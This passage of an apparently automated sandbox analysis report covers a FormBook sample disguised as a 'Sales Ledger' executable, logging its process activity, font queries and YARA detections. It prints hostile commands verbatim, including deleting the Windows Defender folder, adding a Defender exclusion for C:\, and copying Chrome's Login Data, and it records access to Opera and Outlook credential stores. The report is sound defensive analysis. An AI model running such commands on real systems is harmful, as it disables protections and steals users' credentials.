                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' /WindowState 0 /CommandLine 'rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse' /StartDirectory '' /RunAs 8 /Run
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'powershell' Add-MpPreference -ExclusionPath C:\
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process created: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 2644
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 6332
                  Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
                  Source: explorer.exe, 00000019.00000000.318115996.0000000001398000.00000004.00000020.sdmp Binary or memory string: ProgmanamF
                  Source: explorer.exe, 00000019.00000002.479165173.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 00000020.00000002.479790107.0000000003550000.00000002.00000001.sdmp Binary or memory string: Program Manager
                  Source: explorer.exe, 00000019.00000000.348253683.000000000871F000.00000004.00000001.sdmp, cmmon32.exe, 00000020.00000002.479790107.0000000003550000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
                  Source: explorer.exe, 00000019.00000002.479165173.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 00000020.00000002.479790107.0000000003550000.00000002.00000001.sdmp Binary or memory string: Progman
                  Source: explorer.exe, 00000019.00000002.479165173.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 00000020.00000002.479790107.0000000003550000.00000002.00000001.sdmp Binary or memory string: Progmanlock
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe | Code function: 9_2_0040A272 WriteProcessMemory, GetVersionExW, CreateRemoteThread
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information:

                  Yara detected FormBook
                  Source: Yara match | File source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\SysWOW64\cmmon32.exe | File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
                  Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Tries to steal Mail credentials (via file access)
                  Source: C:\Windows\SysWOW64\cmmon32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                  Remote Access Functionality:

                  Yara detected FormBook
                  Source: Yara match | File source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE

